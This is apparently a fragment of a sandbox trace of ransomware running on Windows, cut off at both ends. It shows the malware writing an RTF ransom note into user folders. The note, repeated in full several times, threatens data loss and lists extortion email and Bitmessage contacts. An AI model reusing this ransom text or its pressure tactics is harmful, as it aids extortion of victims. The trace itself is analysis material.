EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.342] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.343] CloseHandle (hObject=0x294) returned 1 [0273.343] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0273.343] GetLastError () returned 0x2 [0273.343] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 